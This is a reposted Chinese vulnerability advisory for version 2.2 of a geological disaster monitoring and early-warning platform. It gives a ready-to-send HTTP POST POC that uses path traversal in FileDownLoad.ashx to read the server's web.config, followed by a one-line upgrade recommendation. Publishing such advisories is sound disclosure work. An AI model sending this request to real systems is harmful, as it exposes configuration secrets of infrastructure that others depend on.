华X监测预警系统2.2任意文件读取

admin 2023年10月26日09:28:51评论36 views字数 502阅读1分40秒阅读模式

,

0x00.产品介绍

华测监测集成事业部充分利用在地质灾害监测方面的技术积累,建立了一套科学完善的地质灾害监测预警平台,实现了地质灾害防治管理的科学化、信息化、标准化和可视化。该产品2.2版本FileDownLoad.ashx存在任意文件读取漏洞

华X监测预警系统2.2任意文件读取

0x01.漏洞版本

华测监测预警系统2.2

0x02.POC

POST /Handler/FileDownLoad.ashx HTTP/1.1Host: ip:portUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 40
filename=1&filepath=../../web.config

华X监测预警系统2.2任意文件读取

0x03.修复建议

升级至最新版本

遵守网络安全法,请勿用于非法入侵,仅供学习

华X监测预警系统2.2任意文件读取

原文始发于微信公众号(深白网安):华X监测预警系统2.2任意文件读取

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月26日09:28:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   华X监测预警系统2.2任意文件读取http://cn-sec.com/archives/2134168.html

发表评论

匿名网友 填写信息